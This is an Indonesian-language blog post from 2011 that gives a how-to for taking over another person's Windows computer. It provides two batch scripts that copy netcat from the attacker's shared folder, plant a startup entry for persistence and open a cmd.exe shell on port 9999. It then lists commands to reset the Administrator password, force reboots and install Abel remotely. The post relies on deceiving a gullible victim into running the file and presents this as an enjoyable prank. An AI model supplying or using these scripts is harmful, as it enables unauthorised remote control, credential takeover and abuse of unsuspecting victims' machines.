Featured Post 6

SEGENAP KOMUNITAS CYBERMEDIA COMMUNITY MENGUCAPKAN MINAL AIDHIN WAL FA IZIN MAAFKAN LAHIR DAN BATIN
Jika Anda Ingin Pasang Iklan Anda disitus Ini silahkan Hubungi Admin di 085294942040 (Poetra)

Sabtu, 31 Desember 2011

Hacking a Network Computer

Saya menulis ini karena benar-benar bekerja untuk saya beberapa kali dan saya harap hal ini untuk Anda juga, semua yang Anda butuhkan adalah sasaran yang sangat yang mudah ditipu.

Seperti yang kita semua tahu, sebuah Trojan sangat mungkin akan dijemput oleh AV, apa yang Anda butuhkan adalah Netcat, netcat akan membuka port pada komputer untuk mengakses (Jika digunakan dengan benar oleh sebuah file batch, Anda akan membuka port pada komputer target). The batch file untuk menyalin netcat pada remote computer harus dijalankan dari komputer target (Target harus mengeksekusi file batch dengan cara tertentu). Buka Notepad dan ketik ini:

Code: Kode:
@echo off

cd\
xcopy \\IPAnda\shared folder\netcat.exe
copy \\IPAnda\shared folder\netcat.exe (Hanya untuk memastikan)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs cd Startup
xcopy \\IPAnda\shared folder\Startup.bat (Ini adalah file batch lain yang Anda akan tulis)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Simpan file sebagai file batch dengan menggunakan Notepad.

File batch berikutnya akan digunakan untuk memastikan port yang Anda berikan akan membuka windows setiap kali dijalankan, Anda dapat menentukan semua port yang Anda inginkan. Buka Notepad dan ketik:
Code: Kode:
 @echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Simpan file sebagai file batch dengan menggunakan Notepad, ini akan menjadi file yang disalin ke folder startup di file batch sebelumnya yang kita tulis. Anda dapat menyatukan batch file untuk file lain dan memberikan file, membiarkan target mengeksekusi file tersebut sehingga ia dapat menyalin netcat dan file batch yang lain ke komputer miliknya sehingga membuka port 9.999, setelah port 9.999 telah terbuka maka Anda dapat menggunakan telnet dan telnet ke port pada komputer target untuk memiliki akses penuh tanpa perlu mengetikkan password. Setelah Anda berada dalam pengubah password Administrator dan jika sesuatu terjadi pada file Anda, perintahnya adalah:

net user Administrator Newpassword

Sekarang dari sini Anda bisa melakukan apa yang Anda inginkan, misalnya mencoba mematikan komputer target dengan browsing ke folder system32 dan kemudian ketik:

shutdown-r-t 10-c "Hello"

komputer kemudian akan restart dalam waktu 10 detik. Anda bahkan dapat bermain-main lagi dengan Instalasi Cain & Abel pada komputer Anda dan kemudian menginstal Abel remotely di komputernya (Sejak Anda tahu password Administrator) Segera sesudah Anda menginstal Abel pada target, Anda dapat memulai dan memberhentikan layanan dan Anda dapat melakukan lebih banyak lagi!

Selamat Menikmati.

0 komentar:

Posting Komentar

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More